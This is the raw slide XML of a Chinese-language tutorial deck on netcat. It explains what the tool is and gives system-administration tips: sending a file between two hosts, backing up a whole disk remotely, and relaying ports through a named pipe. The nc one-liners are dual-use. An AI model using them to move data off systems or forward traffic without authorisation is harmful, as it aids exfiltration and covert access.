                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mkfifo nc_pipe</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1" spc="450"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2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624205" y="2220595"/>
            <a:ext cx="7921625" cy="358140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1400" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc -l -p 1234 &lt; nc_pipe | nc 127.0.0.1 5678 &gt; nc_pipe</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="9" grpId="0"/>
      <p:bldP spid="17" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="2"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直角三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1273629"/>
            <a:ext cx="6836228" cy="3869871"/>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书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3610610" y="1305560"/>
            <a:ext cx="5105400" cy="2561590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="600">
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>有时候，你需要在两台电脑之间传输文件。也可以用 nc 搞定。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>为了叙述方便，假设你有两台主机 A 与 B，你要把 A 主机上的文件 file1 传输到 B 主机上，保存为 file2。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786130" y="446405"/>
            <a:ext cx="7358380" cy="468630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>招数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：（系统管理）用 nc 传输文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="5"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40080" y="2870200"/>
            <a:ext cx="7879715" cy="1922145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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内容占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755650" y="3724275"/>
            <a:ext cx="7763510" cy="1014095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="6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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>然后在【发送端】（A 主机）运行如下命令。</a:t>
            </a:r>
            <a:endParaRPr sz="1400" spc="6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lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第二条命令中的 xxx是端口号，要与第一条命令中的端口号相同；第二条命令中的 x.x.x.x 是【主机 B】的 IP 地址。</a:t>
            </a:r>
            <a:endParaRPr sz="1400" spc="6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 name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624205" y="1059815"/>
            <a:ext cx="7895590" cy="1490345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624297" y="1046766"/>
            <a:ext cx="1914585" cy="5921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2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="内容占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755393" y="1633231"/>
            <a:ext cx="7774471" cy="737235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="6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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>你先在【接收端】（B 主机）运行如下命令（其中的 xxx 是端口号）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" spc="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矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695635" y="446207"/>
            <a:ext cx="3752730" cy="468630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>用法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2915920" y="1179195"/>
            <a:ext cx="4329430" cy="375920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc -l -p xxx &gt; file2</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1" spc="450"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2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2987675" y="3148330"/>
            <a:ext cx="4328795" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc x.x.x.x xxx &lt; file1</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="9" grpId="0"/>
      <p:bldP spid="17" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="2"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直角三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1273629"/>
            <a:ext cx="6836228" cy="3869871"/>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书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3268980" y="961390"/>
            <a:ext cx="5490845" cy="4067810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="600">
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>“磁盘复制”【不同于】“在两块磁盘之间复制文件”。两者之间有很多差别，至少包括：  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>性能差异—如果“源盘”上有非常多的小文件，在两块磁盘之间复制文件就会【非常慢】。  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>完整性差异—“磁盘复制”可以确保两块盘的内容是完全一致滴。而如果你仅仅在两块磁盘之间复制文件，很多信息都损失掉了。  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786130" y="446405"/>
            <a:ext cx="7358380" cy="868680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>招数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：（系统管理）用 nc 远程备份整个磁盘</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="5"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a:off x="0" y="0"/>
            <a:ext cx="6491153" cy="5143500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8531131"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 3660868 w 8531131"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 8531131 w 8531131"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 3660868 w 8531131"/>
              <a:gd name="connsiteY3" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 853113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31131" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3660868" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8531131" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3660868" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="685800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sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827518" y="1443877"/>
            <a:ext cx="3924435" cy="1607185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是个啥玩意儿？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5000" b="1" spc="225" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="等腰三角形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899969" y="3076140"/>
            <a:ext cx="720080" cy="456479"/>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2" descr="C:\Users\Administrator\Desktop\51yuadddnsu.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13172"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3923928" y="159481"/>
            <a:ext cx="5271253" cy="4984019"/>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197768" y="159482"/>
            <a:ext cx="8748464" cy="4824536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="190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p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>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24205" y="3075940"/>
            <a:ext cx="7879715" cy="1922145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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内容占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755650" y="3724275"/>
            <a:ext cx="7763510" cy="1014095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="6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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>然后在【发送端】（A 主机）运行如下命令。</a:t>
            </a:r>
            <a:endParaRPr sz="1400" spc="6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lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第二条命令中的 xxx是端口号，要与第一条命令中的端口号相同；第二条命令中的 x.x.x.x 是【主机 B】的 IP 地址。</a:t>
            </a:r>
